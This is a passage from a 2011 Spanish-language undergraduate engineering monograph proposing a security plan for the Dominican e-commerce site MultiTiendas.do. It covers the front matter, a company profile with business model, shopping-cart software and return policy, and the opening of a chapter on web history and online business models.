DECANATO DE INFORMÁTICA
220
UNIVERSIDAD APEC UNAPEC DECANATO DE INFORMÁTICA “PROPUESTA DE SEGURIDAD: MITIGACIÓN DE RIESGOS Y POTENCIANDO OPORTUNIDADES”. CASO: MULTITIENDAS.DO SUSTENTADO POR: JONATHAN FCO. ABRÉU GARCÍA 2001-2733 EZEQUIEL SEPÚLVEDA 2002-1718 ASESOR: DEIVIS ADAMES MONOGRAFÍA PARA OPTAR POR EL TITULO EN: INGENIERÍA EN SISTEMAS SANTO DOMINGO, D.N. AGOSTO, 2011
Transcript of DECANATO DE INFORMÁTICA
UNIVERSIDAD APEC UNAPEC
DECANATO DE INFORMÁTICA
“PROPUESTA DE SEGURIDAD: MITIGACIÓN DE RIESGOS Y POTENCIANDO OPORTUNIDADES”.
CASO: MULTITIENDAS.DO
SUSTENTADO POR:
JONATHAN FCO. ABRÉU GARCÍA 2001-2733 EZEQUIEL SEPÚLVEDA 2002-1718
ASESOR: DEIVIS ADAMES
MONOGRAFÍA PARA OPTAR POR EL TITULO EN: INGENIERÍA EN SISTEMAS
SANTO DOMINGO, D.N. AGOSTO, 2011
RESUMEN
El presente trabajo fue realizado con el propósito de identificar y mitigar las
amenazas que posee el sitio web Multitiendas.do. Ofreciendo una propuesta de
seguridad que garantice la tranquilidad tanto de la empresa como de los
usuarios de dicho sitio.
Se buscaron las más comunes y exhaustivas técnicas de penetración de
sistemas web, su evaluó su funcionamiento y las mejores formas de evitar que
usuarios malintencionados penetren el sitio. Garantizando que la rentabilidad
del sitio sea optima.
Durante dicho análisis los técnicos de Multitinedas.do conocieron las diferentes
metodologías para desarrollar sitios web, las normas y las herramientas para
las mismas. Así como los diferentes tipos de ataques, tanto al sitio como a los
servidores Web.
Con la propuesta de seguridad ofrecida al sitio Multitiendas.do, la empresa se
verá protegida de los más eficaces ataques a servidores web y al código del su
tienda virtual. Asegura que sus usuarios compren sin temores y cerciora un
rápido ascenso dentro de los portales de comercio electrónico del mundo, ya
que brinda seguridad en un 99.99%.
TABLA DE CONTENIDO
RESUMEN ................................................................................................................................. 2
AGRADECIMIENTOS ............................................................................................................ 7
DEDICATORIA......................................................................................................................... 9
INTRODUCCION ..................................................................................................................... 1
CAPÍTULO I: ............................................................................................................................. 4
WEB MOBILE SOFTWARE SOLUTIONS “MULTITIENDAS.DO” ........................ 4
CAPÍTULO I: WEB MOBILE SOFTWARE SOLUTIONS “MULTITIENDAS.DO”
....................................................................................................................................................... 5
1.1 - PERFIL DE LA EMPRESA ........................................................................................................ 5
1.2 - MISIÓN ........................................................................................................................................ 5
1.3 - VISIÓN ......................................................................................................................................... 5
1.4 - VALORES ................................................................................................................................... 6
1.5 - ESTRUCTURA ORGANIZACIONAL ........................................................................................ 6
1.6 - MODELO DE NEGOCIO ............................................................................................................ 7
RETORNO DE MERCANCÍA ........................................................................................... 17
1.7 – SERVICIOS .............................................................................................................................. 20
1.7.1 - DESCRIPCIÓN DE LOS SERVICIOS ................................................................................. 20
1.8 - PROYECCIÓN .......................................................................................................................... 22
1.8.1 Estrategia de publicidad. .......................................................................................................... 23
CAPÍTULO II: PÁGINAS WEB ........................................................................................ 25
2.1 - Origen. ...................................................................................................................................... 25
2.2 - Web 2.0. .................................................................................................................................... 26
2.3 - El negocio de la Web. ............................................................................................................. 29
2.5 - Lenguajes de programación Web. ....................................................................................... 35
2.6 - Herramientas de Desarrollo Web. ........................................................................................ 38
2.7 - Errores de implementación. .................................................................................................. 43
2.7.1 - Funcionamiento vs seguridad. .............................................................................................. 44
2.7.2 - Tiempo vs seguridad. ............................................................................................................. 44
2.8 - Web Semántica. ....................................................................................................................... 45
CAPÍTULO III: ....................................................................................................................... 50
COMERCIO ELECTRÓNICO ........................................................................................... 50
CAPÍTULO III: COMERCIO ELECTRÓNICO ............................................................. 51
3.1 - Orígenes. .................................................................................................................................. 51
3.2 - Implementación. ...................................................................................................................... 51
3.3 - Ley No.126-02 Sobre Comercio Electrónico, Documentos y firma digital. .................. 52
3.3.1 - Norma sobre la protección de los derechos de los usuarios y consumidores. .............. 53
3.3.2 - Norma sobre la protección de datos personales................................................................ 54
3.3.3 - Norma sobre medios de pagos electrónicos. ..................................................................... 54
3.4 - Métodos de Pago. ................................................................................................................... 55
3.5 - Requisitos de afiliación a empresas procesadoras de pago .......................................... 55
3.5.1 - Requisitos para la afiliación de comercio electrónico en VISANET para sitio web. ..... 55
3.5.2 - Requisitos para la afiliación de comercio electrónico en CARDNET para sitio web. ... 60
3.5.3 - Solicitudes empresa procesadora de pagos en línea AvisorTech................................... 62
CAPITULO IV ........................................................................................................................ 64
ANTECEDENTES ................................................................................................................ 64
CAPÍTULO IV: ANTECEDENTES ................................................................................................... 65
4.1 - Antecedentes. .......................................................................................................................... 65
4.2 - Vulnerabilidades en portales electrónicos. ........................................................................ 66
4.3 - Ataques Web. ........................................................................................................................... 67
4.3.1 - Agentes amenazadores. ........................................................................................................ 67
4.3.2 - Tipos de ataques. ................................................................................................................... 68
4.4 - Ejemplos y prevención de ataques. .................................................................................... 78
4.4.1 - Mitigación de Riesgos ............................................................................................................ 95
4.5 - Programación segura. .......................................................................................................... 104
4.5.1 - Uso de códigos obsoletos. .................................................................................................. 104
4.5.1 - W3C. ....................................................................................................................................... 105
CAPÍTULO V: ..................................................................................................................... 109
SERVICIO DE HOSPEDAJE ......................................................................................... 109
CAPÍTULO V: SERVICIO DE HOSPEDAJE ............................................................ 110
5.1 – Introducción .......................................................................................................................... 110
5.2 - Servicios de seguridad. ....................................................................................................... 111
5.2.1 - Tipos de Servicios. ............................................................................................................. 112
5.3 - Ataques a servidores web. .................................................................................................. 119
5.3.1 - Tipos de ataques ................................................................................................................. 120
5.4 - Controles. ............................................................................................................................... 126
5.5 – Impactos. ......................................................................................................................... 130
5.6 - Mitigando los riesgos. .......................................................................................................... 132
CAPÍTULO VI: FRAUDES CIBERNÉTICOS ........................................................... 135
6.1 - Modelo económico. .............................................................................................................. 136
6.2 - Los roles del Ciber Fraude .................................................................................................. 137
6.3 - Técnicas. ................................................................................................................................ 139
6.4 - Impactos al negocio. ............................................................................................................ 145
6.5 - Reputación empresarial. ...................................................................................................... 146
6.5.1 - Reputación Online. ............................................................................................................. 146
6.5.2 - Aspectos negativos organizacionales. ......................................................................... 147
6.6 – Negociación de información financiera. .......................................................................... 149
6.6.1 - Comprando/Vendiendo información financiera. ......................................................... 150
CAPÍTULO VII:................................................................................................................... 152
CRIMEN ELECTRÓNICO ............................................................................................... 152
CAPÍTULO VII: CRIMEN ELECTRÓNICO ............................................................... 153
7.1 - Crímenes organizados ......................................................................................................... 154
7.2 - Publicación de data confidencial. ...................................................................................... 163
7.3 - Prevención de Ciber-Crímenes .......................................................................................... 165
7.4 - Leyes reguladoras ................................................................................................................ 168
CAPÍTULO VIII: PROPUESTA SEGURIDAD .......................................................... 177
8.1 - Introducción .......................................................................................................................... 177
8.2 - Matriz de Riesgo .................................................................................................................... 177
8.3 - Informe de Vulnerabilidades ............................................................................................... 178
8.4 - Controles ................................................................................................................................ 179
8.5 - Informe Final .......................................................................................................................... 180
CONCLUSIÓN ................................................................................................................... 183
BIBLIOGRAFÍA ................................................................................................................. 186
ANEXOS.
AGRADECIMIENTOS
Quiero agradecer a Dios, por ser tan paciente conmigo y darme tanto la mano
cuando lo necesité, sé que no hubiese podido alcanzar mis metas sin su ayuda.
Quiero agradecer el apoyo brindado por mi padre, Ezequiel Antonio Sepúlveda,
quien nunca se rindió y se mantuvo atento a que siempre asistiera a la
universidad. Agradezco su dedicación y su apoyo incondicional para que
pudiera estudiar y terminar mi carrera. Utilizando las más ingeniosas técnicas
persuasivas para lograrlo, incluso cuando pensé que no era necesario seguir
estudiando, el me demostró junto con el destino que es importante ser
profesional y completar los estudios, realmente gracias mi querido viejo.
Ezequiel Sepúlveda
AGRADECIMIENTOS
Quiero agradecer a mi padre, Héctor Abreu, quien siempre está al tanto en mis
estudios, gracias por los recursos que hicieron posible poder completar mi
carrera. Agradezco a mi madre, Nina García, quien en muchas ocasiones
reforzaba mi interés para terminar la carrera.
Jonathan Abreu
DEDICATORIA
Le dedico este trabajo a Dios, a mi padre, y a mi madre que a pesar de la
distancia siempre ha estado para darme apoyo incondicional. Muy
especialmente le dedico este esfuerzo a mi querido padre que realmente solo
Dios y él han sido responsables por este logro, yo simplemente he sido una
herramienta para alcanzar esta tan preciada meta.
Ezequiel Sepúlveda.
DEDICATORIA
Este trabajo está dedicado a todos aquellos que se mantuvieron al tanto de
cada paso en el desarrollo del mismo. Dedicado a un grupo grande de amigos
anónimos, quienes me facilitaron fuentes exclusivas sobre el tema de la
monografía.
Jonathan Abreu.
1
INTRODUCCION
Desde los principios de la historia del hombre, este ha desarrollado diversos
métodos de comercio, a través de su evolución se creó el dinero, y partiendo
de ahí las diferentes formas de vender y comprar. Con la revolución industrial
en el siglo pasado, la forma en la que el hombre creció fue exponencial, y el
surgimiento del Internet ayudó a conectar a personas de todo el mundo a
través de la World Wide Web.
Es mediante la Web donde la nueva forma de comercio se ha venido
desarrollando en los últimos años. Portales como Ebay.com, amazon.com,
bestbuy.com, newegg.com, entre otros, se benefician altamente del comercio
electrónico a nivel mundial, vendiendo miles de millones de dólares
mensualmente. Lo que ha llevado que el comercio electrónico sea el
responsable, solamente en estado unidos, de un 6% del total de las ventas de
este país, donde movió más de 155 billones de dólares en el año 2009.
En la república dominicana existen varios portales dedicados al comercio
electrónico, dichos portales no lo hacen de una forma directa, debido al miedo
existente por los internautas a fraudes electrónicos o simplemente la carencia
de un sistema jurídico eficaz en el país. Aunque dicho miedo se ha disuelto un
poco en los últimos años, gracias a algunos portales de ventas como el de el
supermercado nacional, además del crecimiento del conocimiento por parte de
los internautas sobre el uso de portales electrónicos. Es dicha creciente
confianza lo que ha permitido a ciertos portales locales surgir y son más las
2
iniciativas por parte de diferentes empresas por desarrollar y explotar el tema
de comercio electrónico en la República Dominicana.
Pero no todo es vender a través de un sitio web, existen muchos riesgos y
amenazas en Internet, es por ello que desarrollar un sitio dedicado al comercio
debe de tomarse mayores medidas de seguridad que en los portales
tradicionales. El tema de seguridad Web es primordial cuando se habla de
realizar transacciones en línea y donde el dinero e informaciones de los
usuarios pueden verse comprometido por ataques informáticos.
Debido al gran número de ataques informáticos que reciben los portales en
todo el mundo, donde alrededor del 90% de los sitios web del han sido víctimas
de algún tipo de ataque, es importante conocer y tomar las medidas pertinentes
para mitigar dichas amenazas y minimizar los riesgos. Siendo el primer paso de
esto, identificar las vulnerabilidades del sitio y aplicar los controles pertinentes
para minimizar todo tipo de amenaza.
Esta monografía abarca ocho capítulos esenciales para conocer, identificar y
mitigar las amenazas web del portal electrónico MultiTiendas.do. En el primer
capítulo se conocerá el perfil de la empresa, su misión, visión, valores, como
está estructurada, así como también el modelo de negocio que esta posee, los
servicios que ofrece y su proyección. En el segundo capítulo se hablará sobre
páginas web en general, su origen y evolución, su funcionamiento,
herramientas y métodos efectivos de programación. En el tercer capítulo
hablaremos sobre el comercio electrónico, y cuáles son las herramientas y
requisitos para su realización. En el cuarto capítulo trataremos el tema de
3
seguridad web, donde conoceremos las vulnerabilidades web, los principales
ataques y como mitigarlos. El quinto capítulo abarca el tema de Servidores
Web, donde veremos su funcionamiento, los diferentes ataques y el impacto
de los mismos. En el sexto capítulo hablaremos sobre Fraudes Cibernéticos y
las diferentes tácticas y técnicas para realizar dichas acciones. En el séptimo
capítulo hablaremos sobre el Ciber-Crimen, las tácticas y códigos utilizados
para los mismos y las leyes reguladoras. El octavo y último capítulo
ofreceremos una propuesta de seguridad para el portal MultiTiendas.do
partiendo de un análisis de riesgo y ofreciendo óptima seguridad para el portal.
4
CAPÍTULO I: WEB MOBILE SOFTWARE SOLUTIONS
“MULTITIENDAS.DO”
5
CAPÍTULO I: WEB MOBILE SOFTWARE SOLUTIONS
“MULTITIENDAS.DO”
En el presente capitulo se expondrán aspectos específicos de los servicios del
producto MultiTiendas de la empresa WMSS (Web Mobile Softwares
Solutions), tales como: misión, visión, valores, estructura organizacional,
servicios que ofrece la misma; entre otros.
1.1 - PERFIL DE LA EMPRESA
MultiTiendas es el producto principal de la empresa WMSS que tiene como
objetivo brindar a los usuarios de República Dominicana un servicio de
compras en línea.
1.2 - MISIÓN
Brindar el mejor servicio en línea para satisfacer a los usuarios en Internet, el
poder visitar un portal con seguridad donde estén las mejores tiendas de ropa y
accesorios tanto para mujeres, hombres, niños y niñas en santo domingo y
principales provincias del país, con la facilidad de comprar los productos online,
365 días, 24 horas.
1.3 - VISIÓN
Ser el portal de preferencia para el dominicano a la hora de comprar en línea
ropas y accesorios a las mejores tiendas del país.
6
1.4 - VALORES
MultiTiendas se esfuerza día a día, para ofrecer un mejor servicio a los clientes
de alta calidad y confiable; nos identificamos con los valores que a continuación
se presentan:
I.Calidad.
II.Compromiso.
III.Satisfacción.
IV.Seguridad.
V.Variedad.
VI.Innovación.
VII.Coherencia.
VIII.Confianza.
IX.Estabilidad.
1.5 - ESTRUCTURA ORGANIZACIONAL
Una Estructura Organizacional se refiere a “La distribución formal de los
empleos dentro de Una organización”. Cuando los gerentes desarrollan o
cambian la estructura, participan en el diseño organizacional. Este proceso
involucra decisiones sobre seis elementos claves: especialización del trabajo,
departamentalización, cadena de mando, amplitud de control, centralización y
descentralización, y formalización1. Un organigrama refleja visualmente la
estructura.
El organigrama General de MultiTiendas se muestra en la siguiente figura No.
1:
1 Robbins, Stephen. (2005). Administración. Pearson Educación. 9na edición. México
7
Figura No. 1 Organigrama general de MultiTiendas.do
1.6 - MODELO DE NEGOCIO
En nuestro país estamos en una etapa de experimentación y pruebas, donde
todavía no hay suficiente experiencia respecto a la respuesta del mercado para
concluir claramente acerca de cuáles modelos serán finalmente exitosos, el
ROI2 es variable. Aun así conocemos las mejores prácticas en mercadeo para
este tipo de negocio.
2 ROI o retorno de la inversión (por sus siglas en ingles Return of Investment) es el ratio que compara el
beneficio o la utilidad obtenida en relación a la inversión realizada.
8
Para los proveedores y comerciantes:
- Mayor facilidad para llevar estadísticas de diverso tipo sobre sus
clientes y su negocio, incluyendo la posibilidad de adquirir datos y
perfiles de los clientes en un formato que facilita su inmediata
sistematización y su aprovechamiento como “inteligencia comercial”.
- La oportunidad para comercializadores que organizan ofertas de
diversos fabricantes y se especializan en la agregación de información,
la venta, la atención al cliente, la gestión del despacho y la entrega,
y el valor agregado de información sobre productos, esta última
inclusive aportada por los mismos clientes.
- El acceso relativamente fácil a un mercado potencial muy amplio,
en principio de dimensiones mundiales. Es por esto que se tornan
viables negocios cuyas demandas limitadas en una región los hacían
imposibles en el pasado.
Ventajas para los compradores:
- El acceso fácil a multitud de ofertas.
- Facilidad de pago con tarjetas de crédito y via telefónica con seguridad.
- Contar con la opción de envió a domicilio en el distrito nacional y otras
provincias del país en menos de 24 horas.
9
- La capacidad de comparar las ofertas, bien sea personalmente, o
con ayuda de los servicios de “agentes de software”
o “infomediarios” (intermediarios de información).
- La posibilidad de compartir información, evaluaciones y opiniones
sobre los productos con muchos otros consumidores.
- La posibilidad de asociarse temporalmente con otras personas que
buscan el mismo producto, para formar una demanda agregada
susceptible de obtener precios más favorables.
- Organizar el resultado de búsqueda de un producto en: Precio más bajo,
precio más caro, favoritos, más populares y mas comprados.
- Soporte en línea para los compradores.
- Compras con GiftCards en todos los productos.
- Asistencia telefónica.
- Recibir vía correo las ofertas según el género, masculino o femenino.
Comprador individual, vendedores compitiendo:
Es donde un potencial comprador busca en la página un producto y esta
realiza una búsqueda que coincida con los productos en las diferentes tiendas.
La transacción se realiza en las condiciones más favorables para el comprador:
el precio final es el menor de los postulados.
10
Paginas como Amazon.com utilizan este tipo de modelo. Este esquema
tiene una potencialidad enorme para que las tiendan brinden buenos
precios de sus productos de una manera competitiva.
El portal cuenta con un diseño atractivo, orientado al comercio electrónico, los
colores y los diseños seleccionados cuidadosamente y siempre pensando en la
facilidad de navegación y seguridad del usuario (ver imagen 1.6.1).
Imagen 1.6.1: Diseño del portal MultiTiendas.do
11
La página principal posee varias divisiones para información en general, una
columna exclusivamente para clientes, ofertas e informaciones relevantes al
usuario.
Un slide para promociones o informaciones en general (ver imagen 1.6.2).
Imagen 1.6.2: Slide promocional
Publicidad sobre las “tarjetas MultiTiendas”
Los productos en ofertas se muestran de esta forma (ver imagen 1.6.3), con
una franja azul que resalta la cantidad en porcentaje de la oferta. Otras
informaciones como el precio, nombre del producto y su disponibilidad en el
inventario y el nombre del vendedor también se muestran.
12
Imagen 1.6.3: Productos en Oferta en el portal MultiTiendas.do
Ejemplos de procedimientos de compra:
Luego de navegar eligiendo los productos para la compra, se dirige al
carrito de compras para completar el pedido y pago. Vemos los
productos seleccionados, cantidad, y total (Ver imagen 1.6.4).
Imagen: 1.6.4: Pre-selección de productos a comprar
13
Se Completa el formulario con los datos para saber a dónde se realizara el
envío(Ver imagen 1.6.5).
Imagen 1.6.5: Formulario de Envio.
14
Se desglosa el total a pagar y se ofrece diferentes opciones de pago (Ver
imagen 1.6.6).
Imagen 1.6.6: Formas de pago
Al final se muestra un resumen de la compra con la notificación de una
copia vía correo electrónico (ver imagen 1.6.7).
15
A partir de este momento se envía una copia de la orden al departamento
encargado de despachar los productos. En lo adelante el cliente cuenta con 24
horas de esperas o menos.
Imagen 1.6.7: Pantalla “orden comletada”.
Luego de probar varios software de carros de compras, se decidió utilizar X-
Cart. La diferencia entre las soluciones Open Source y el X-Cart, es que este
último es un carro de compras certificado, es más seguro, te permite visualizar
los productos por relevancia (ver imagen 1.6.8) y tiene soporte las 24 horas,
aunque requiere una licencia válida para utilizarse. Para muchos el dinero no
es un problema cuando se trata de seguridad y confianza en línea. El X-Cart
tiene actualmente más de 14.000 tiendas en línea utilizando este producto con
éxito.
16
Opciones del producto
El producto tiene dos versiones el Gold y el Pro. Para el caso de MultiTiendas
se utiliza la versión Pro. Tiene una interfaz de administrar (back-end) donde se
puede manejar los productos, clientes, las plantillas de la tienda. Si se tiene
ciertas dudas se puede contactar el equipo de soporte de X-cart.
El X-cart corre sobre la tecnología PHP con bases de datos MySQL. Las
paginas generadas pueden ser dinámicas de forma .php? variables y posee la
opción de utilizar una forma optimizada para SEO3 que convierte los URLS en
este formato “www.MultiTiendas.com/p-934-zapatos-rojos.html” así los
buscadores web encuentran más fácil los productos.
También se pueden agregar palabras claves o “keywords” para cada página o
productos, sobre las necesidades, ofreciendo una integración SEO completa.
También hay una oferta de plantillas, donde cada tienda puede tener un diseño
diferente. Se pueden cambiar las posiciones de ciertos bloques y definir
esquemas de colores e imágenes con logo.
Ventajas de usar X-cart:
Cuenta son soporte las 24 horas.
Cuenta con un back-end donde el proveedor, en este caso el vendedor,
puede manejar a su antojo cada precio, itbis, cantidad de productos,
entre otros.
Optimización del motor de búsqueda.
3 Posicionamiento en buscadores, por sus siglas en ingles Search Engine Optimizer (SEO) es el proceso de
mejorar la visibilidad de un sitio web en los diferentes buscadores, como Google, Yahoo! o Bing de manera orgánica, es decir sin pagarle dinero al buscador para tener acceso a una posición destacada en los resultados.
17
Soportes para múltiples vendedores.
Imagen 1.6.8: Ejemplo de cómo ordenar productos por relevancia.
Retorno de Mercancía
Politicas de devolucion de MultiTiendas.com.do
Devolución de compras en línea
Para devoluciones es necesario cumplir con los siguientes puntos:
Realizar la devolución en un plazo de 24 horas luego de haber recibido el artículo.
Tener la factura de compra El articulo debe de estar en perfectas condiciones El artículo deberá de tener los sellos de código
Ninguna tienda asociada a MultiTiendas realiza reembolsos en efectivo.
Período de devolución
18
Devuelva las compras en línea dentro del plazo de tiempo que se encuentra a
continuación. El período de devolución comienza a partir de la fecha en la que
recibió su pedido.
24 horas para todos los productos.
Si necesita comunicarse con la tienda a la cual fue comprada el artículo, puede
conseguir el numero de contacto en el recibo de entrega del producto, en caso
de no tener el recibo, busque el numero de la tienda en nuestra lista de
tiendas.
Devoluciones dentro de Santo Domingo
Coloque el artículo que va a devolver en el paquete original, si es posible.
Incluya la etiqueta de devolución e indique la razón de la devolución.
Si así lo desea, puede entregar el paquete personalmente en la sucursal de la
tienda a la cual fue comprado el producto.
Devoluciones desde el Interior del país
Siga estos pasos para devolver producto desde el interior del pais.
Coloque el artículo que va a devolver en el paquete original, si es posible.
Incluya la etiqueta de devolución e indique la razón de la devolución.
Para contar con un comprobante de entrega, le recomendamos que devuelva
los artículos a través del servicio terrestre Caribe Pack de le empresa Caribe
Tours. Para contactar a Caribe Pack, Tel.: (809) 221 - 4422 extensión 2001,
Fax.: (809) 689 - 5053
19
Envíe las devoluciones a la direccion de la tienda a la cual fue comprada. Esta
direccion se encuentra en el recibo de envio o busque la direccion de la tienda
en nuestra Lista de tiendas.
Reintegros
Las tiendas asociadas a MultiTiendas no realizan reembolsos de efectivo. El
proceso es acreditar el balance de la comprar para futuras compras, dichas
compras se deben realizar en un plazo no más de 30 días.
El crédito estará disponible en su cuenta de MultiTiendas para ser utilizado solo
en la tienda que le corresponde.
El crédito se aplica al momento de la devolución y, en general, se registrará
dentro de las 48 horas.
Si devuelve un artículo porque está dañado o defectuoso, o si se le envió un
artículo equivocado:
Le recomendamos que siga los pasos para devoluciones.
Nosotros cubriremos todos los cargos de envíos terrestres habituales y
razonables.
Artículos que no tienen devolución
Tarjetas de creditos MultiTiendas
Tarjetas giftCards
Articulos que hayan estado en ofertas
20
Artículos que han sido dañados por el uso o mal uso del consumidor
Artículos que hayan sido grabados o personalizados
1.7 – SERVICIOS
Una portal orientado al comercio electrónico no está completo sin promociones
llamativas, facilidades de compras, pagos y entregas, para estos fines cuenta
con varios servicios beneficios para el vendedor y para el comprador, servicios
de muchas importancias.
Entre los más relevantes tenemos:
I.Tarjetas MultiTiendas
II.GiftCard MultiTiendas
III.Envíos
Otros servicios, cuentan con columnas dedicadas a la publicidad, espacios
reservados para anuncios, slides en cada página principal del vendedor,
boletines informativos electrónicos o NewsLetters.
1.7.1 - DESCRIPCIÓN DE LOS SERVICIOS
Tarjetas MultiTiendas: consiste en una tarjeta
de crédito afiliada con un banco del país, la
cual funciona como cualquier tarjeta de crédito que goce de los beneficios del
21
banco afiliado, pero adicional tiene una gran particularidad. Al usar tu Tarjeta
MultiTiendas en el portal MultiTiendas.do en cualquier compra, esta le realiza
un % de descuento en cada compra, envíos gratis y participas en ofertas.
GiftCard MultiTiendas: este servicio el cual es
un equivalente a un monto especifico en
dinero, ya sea en dólares o en moneda local,
también se usa como forma de pago, más bien una tipo de bono disponible
para ser consumido en compras. En este caso específico serian GiftCard
virtuales, un código que ingresas al comprar un producto y pagas según el
monto de la GiftCard. Dicha código tiene la facilidad de ser recargada y en los
mejores casos, regaladas a otras personas para compras.
Envíos: Luego de realizar tus compras,
MultiTiendas te brinda la opción de enviarte tus
compras a la dirección especificada a la hora
de comprar.
Boletines de noticias electrónicos o Newsletter: es una publicación
distribuida de forma regular, generalmente centrada en un tema principal que
es del interés de sus suscriptores4.
Publicaciones originadas según el tema de interés o sección de la página, las
cuales son enviadas al correo registrado.
4 http://es.wikipedia.org/wiki/Bolet%C3%ADn_informativo
22
1.8 - PROYECCIÓN
Brindando un servicio web el cual no tiene presencia en el país tomamos
mucho cuidado en los pasos que damos, pero sin miedo al cambio, al crecer.
Trabajamos siempre con la confianza de brindar un mejor servicio, de
adaptarnos a los tiempos, a las exigencias del usuario y el mercado.
Trabajando con compromiso y calidad cada día, con buenas campañas
publicitarias, la ayuda de las redes sociales y el personal de mercadeo
lograremos cumplir con nuestra visión.
Lograremos situarnos como la mejor página de comercio electrónico, completa,
con presencia tanto web como móvil. Brindando la comodidad de comprar tras
el Internet llegaremos a vender al igual que las compras físicas, donde cada
tienda será la que mas gane.
23
1.8.1 Estrategia de publicidad.
Se utilizarán diversos medios de publicidad. Cada una con una estrategia
diferente, partiendo del medio.
Internet
Se colocarán Banners en páginas de Facebook, Hi5, Youtube, Google y en los
principales medios de noticias del país, también banners en cuentas de email
gratuitos: Yahoo, Hotmail, Gmail. Así como también envío de correos masivos
nacional e internacionalmente y presencia en chats de mensajería instantánea.
Centros de acopio
Publicidad Objetiva (Material POP) colocando Afiches en gasolineras,
universidades, gimnasios, plazas comerciales, supermercados, tiendas por
departamentos, entre otros.
Promociones
Visita de promotores a las universidades y plazas comerciales con brouchures
para captar visitantes. Colocación de afiches en locales de los aliados
estratégicos.
24
CAPÍTULO II: PÁGINAS WEB
25
CAPÍTULO II: PÁGINAS WEB
2.1 - Origen.
“A finales de los años 50, en los tiempos de la guerra fría, los militares
norteamericanos, desarrollaron el ARPANET (Advanced Research Project
Agency Network). Un nuevo modelo de red donde como primera prueba, se
conectó cuatro universidades y algunas instalaciones militares entre sí,
utilizando el ARPANET en vez de los tradicionales sistemas de red en Anillo o
estrella.
Después de dichas pruebas, estas mismas universidades notaron lo útil que
era dicha red para comunicarse entre ellas e intercambiar documentación
electrónica sobre experimentos. Y es así como ARPANET es utilizada con fines
civiles, por universidades y científicos”5.
Es aquí donde entran los científicos del CERN6 que en el año 1989
desarrollaron el concepto de conexión mediante hipervínculos7, lo que permite
evitar las notas de pie de página y las continúas remisiones a otras
publicaciones.
La incorporación de imágenes, gráficos y sonido a los documentos se consiguió
en el año 1993, año del nacimiento de la World Wide Web, al presentarse
Mosaic, el primer navegador de la red. El año siguiente 1994 un joven crea el
directorio Yahoo y pocos meses después surge Excite un portal con correo
electrónico, buscador en línea entre otros servicios. Para el año 1995 el mismo
5 Internet para el profesional tributario, (2001)
6 Organisation Européenne pour la Recherche Nucléaire (Organización Europea para la investigación
nuclear). 7 Salto de una página a otra con solo marcar con un clic del ratón zonas destinadas al efecto
26
creador de Mosaic presenta el navegador web Netscape que fue el navegador
más popular de su tiempo.
Luego con la llegada de Windows 95 y Windows NT el crecimiento de la web
fue simplemente exponencial hasta como lo conocemos en el día de hoy.
2.2 - Web 2.0.
Con la evolución del Internet y la primera fase de la web en su forma
introductoria, a principios del siglo XX, por el año 2003 nace la Web 2.0 que
definida como: “la promesa de una visión realizada: la Red- la Internet, con
mayúscula o minúscula, que se confunde popularmente con la propia Web-
convertida en un espacio social, con cabida para todos los agentes sociales,
capaz de dar soporte a y formar parte de una verdadera sociedad de la
información, la comunicación y/o el conocimiento.”8
La web 2.0 no es más que la evolución de la web hacia un entorno más
interactivo, donde los usuarios son el centro de ellas, permitiendo a cada uno
de los internautas estar conectados entre sí y compartir imágenes, videos e
informaciones en general.
Su inició se dio gracias a los sitios friendster, tribe.net y linkedn en el año
2003, las primeras redes sociales de Internet. Cuyos propietarios curiosamente
se conocían. En este mismo año nace myspace.com usado inicialmente para
los artistas, permitiéndoles subir videos e imágenes y que sus seguidores
8 Fumero, Roca y Antonio, Genís (2007). WEB 2.0. España: Editora Oman Impresores
27
pudieran tener acceso a la misma, ya para el año 2005 ya tenía más de 200
millones de usuarios9.
Por otro lado Facebook.com que nace un año después de myspace.com,
ofrece al usuario la posibilidad de intercambiar y conectarse entre sí de una
manera más profunda y exitosa, aunque les tomó varios años poder superar a
su competidor en aquel entonces “myspace”. (Ver figura 2.2.1).
Figura 2.2.1: Crecimiento MySpace y Facebook en USA.
Aunque los sitios mencionados anteriormente fueron quienes crearon la redes
sociales, el nacimiento real de la web 2.0 se la debemos, en el año 2001, a
Jimmy Wales y Larry Sange creadores de Wikipedia.org. Cuyo concepto
9 http://es.wikipedia.org/wiki/Myspace
28
revoluciono el mundo y la información, ya que cualquier persona es capaz de
proveer información, además, es la primera enciclopedia libre del mundo.
La Web 2.0 utiliza varias herramientas en sus sitios para compartir o publicar
información, entre ellas está los Wikis10 y los Blogs11. Así como también sitios
donde se comparten recursos como fotos, videos, documentos,
presentaciones, redes sociales, aulas virtuales y plataformas educativas.
Algunos ejemplos de sitios donde se comparten recursos:
Sitios de fotos: flickr
Sitios de Videos: Youtube, Vimeo
Sitios de Documentos: Google Docs
Sitios de presentaciones: Slideshare
Redes Sociales: Facebook, Myspace, Google+
Aulas Virtuales: Virtual Classroom
Plataformas educativas: Moodle
10
es un espacio web corporativo, organizado mediante una estructura hipertextual de páginas, donde varias personas autorizadas elaboran contenidos de manera asíncrona. 11
es un espacio web personal en el que su autor, puede escribir cronológicamente artículos, noticias y sus usuarios pueden
29
2.3 - El negocio de la Web.
Para muchas aun hoy en día el negocio de la web es un tanto confuso, ya que
no es de conocimiento general como hacer dinero en la web. Las personas que
no están familiarizadas con el mundo web, distan mucho de imaginarse que la
web es el nuevo medio de hacer dinero. La tendencia que con pocos recursos y
mucho tiempo dedicado puede llevar a individuos que desarrollan un proyecto
en un garaje a ser millonarios como es el caso de Larry Page y Sergey Brin
fundadores de Google.
El negocio de la web funciona de tres formas diferentes: 1- Publicidad en la
web 2- Comercio electrónico. 3.- Servicio en línea.
Publicidad en la Web: La publicidad puede ser de dos tipos: Por Colocación
directa o alquiler de espacio.
Aunque se podría entiende que es igual, una colocación directa es aquella se
hace mediante un contacto directo con el anunciante (ver imagen 2.3.1).
Para los anunciantes existen varios métodos para anunciarse, ya siendo
directamente con el dueño de un portal o utilizando servicios de colocación
publicitarios en Internet como es el caso de Adsense, a través de su programa
Adword12.
De la manera en que funciona Adword es muy sencilla, ya que tu publicidad es
mostrada solamente en sitios web que contiene “palabras” relacionadas con tu
12
Google AdWords es el método que utiliza Google para hacer publicidad patrocinada
30
“target”. Dígase si tu empresa vende Gomas, entonces tu publicidad será
desplegada en sitios web donde su contenido esté relacionado con
automóviles. Claro se pueden hacer todo tipo de relaciones con las palabras,
realmente es todo un mundo para el anunciante.
Por otro lado está la publicidad en sitios como Facebook, donde el cliente
puede seleccionar en detalle (algo que no tiene Adword) (Ver imagen 2.3.2) el
rango de edad de quienes quieres que vean la publicidad, puedes elegir de que
país, su nivel de estudios y de ingreso, también definir que sexo. Esto permite
segmentar mejor el target de público.
